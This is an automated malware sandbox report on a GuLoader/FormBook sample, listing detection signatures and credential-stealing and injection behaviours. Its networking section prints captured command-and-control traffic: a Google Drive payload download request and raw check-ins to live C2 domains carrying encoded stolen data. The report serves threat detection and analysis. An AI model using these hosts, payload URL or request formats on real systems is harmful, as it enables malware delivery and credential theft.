Windows Analysis Report
Grundforbedre39.exe

Overview

General Information

Sample name:	Grundforbedre39.exe
Analysis ID:	1410990
MD5:	0190a49f09dc90c7dc61959581be1e9f
SHA1:	af5d8cfa73b77d96d3a489f5961cdab87c8339be
SHA256:	cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

Yara detected GuLoader

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Grundforbedre39.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.guiguigohost.com/m9so/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Grundforbedre39.exe

ReversingLabs: Detection: 23%

Yara detected FormBook

Source: Yara match	File source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Uses 32bit PE files

Source: Grundforbedre39.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.251.41.14:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.65.161:443 -> 192.168.11.20:49758 version: TLS 1.2

Source: Grundforbedre39.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: netiougc.pdbGCTL source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe, 00000009.00000002.5890904969.0000000000A5E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: wntdll.pdbUGP source: Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Grundforbedre39.exe, Grundforbedre39.exe, 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Grundforbedre39.exe, 00000004.00000001.1042132222.0000000000649000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: netiougc.pdb source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_0040635D FindFirstFileW,FindClose,	0_2_0040635D
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_0040580B
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49778 -> 172.67.158.92:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49782 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49783 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49786 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49787 -> 46.30.215.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49788 -> 46.30.215.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49789 -> 46.30.215.63:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49790 -> 46.30.215.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49795 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49797 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49799 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49805 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49807 -> 172.67.130.3:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49809 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49811 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49813 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49815 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49826 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49828 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 195.110.124.133:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49830 -> 195.110.124.133:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49832 -> 195.110.124.133:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49834 -> 172.67.158.92:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49836 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:49838 -> 198.177.123.106:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49839 -> 46.30.215.63:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49840 -> 46.30.215.63:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.158.92 172.67.158.92
Source: Joe Sandbox View	IP Address: 195.110.124.133 195.110.124.133
Source: Joe Sandbox View	IP Address: 198.177.123.106 198.177.123.106

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: REGISTER-ASIT REGISTER-ASIT
Source: Joe Sandbox View	ASN Name: FINALFRONTIERVG FINALFRONTIERVG
Source: Joe Sandbox View	ASN Name: ONECOMDK ONECOMDK
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noonartists.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.alpinebretech.lifeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.manupaint.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.plainpathproductions.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.teenpattimasterapp.orgConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.wbyzm5.buzzConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.feshi.storeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cyberpsychsecurity.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.meliorras.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=Xg8FqCUssmOzcClrP1dUBt9Tduj8pb94TVXDuPCTJTreZhcpD3ySUs7Oc+hlxVab0la101jy3sXphv2K+D5gks93TxumRvYq05TzXtp4wx5urQWvjqWwNhA=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.guiguigohost.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noonartists.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
Source: global traffic	HTTP traffic detected: GET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.alpinebretech.lifeConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: unknown

HTTP traffic detected: POST /m9so/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.alpinebretech.lifeOrigin: http://www.alpinebretech.lifeReferer: http://www.alpinebretech.life/m9so/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4a 49 46 31 56 2b 66 73 58 70 51 76 39 6a 4d 78 59 36 63 56 50 45 6f 68 43 71 33 6c 59 70 4c 49 63 64 30 4e 41 4c 45 41 64 68 7a 44 33 70 6f 66 45 54 58 71 54 45 2f 66 61 78 46 62 5a 47 57 63 64 41 73 4a 46 79 77 70 33 78 58 74 7a 61 77 31 4b 54 6d 46 4a 50 75 47 64 64 64 2f 44 57 57 39 6f 58 70 69 74 52 69 64 30 57 71 6e 37 61 57 4a 50 33 6e 36 31 2f 46 49 78 45 76 36 52 4d 30 4b 43 73 4d 6a 73 39 4e 4c 4b 63 38 35 43 34 42 56 76 78 30 44 68 34 54 6f 76 6a 41 73 4d 59 61 66 54 68 31 65 75 77 33 48 67 74 5a 45 43 6f 35 50 67 6a 63 52 77 77 3d 3d Data Ascii: LFPxWlV=ghHQ3Gr/MCFEJIF1V+fsXpQv9jMxY6cVPEohCq3lYpLIcd0NALEAdhzD3pofETXqTE/faxFbZGWcdAsJFywp3xXtzaw1KTmFJPuGddd/DWW9oXpitRid0Wqn7aWJP3n61/FIxEv6RM0KCsMjs9NLKc85C4BVvx0Dh4TovjAsMYafTh1euw3HgtZECo5PgjcRww==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
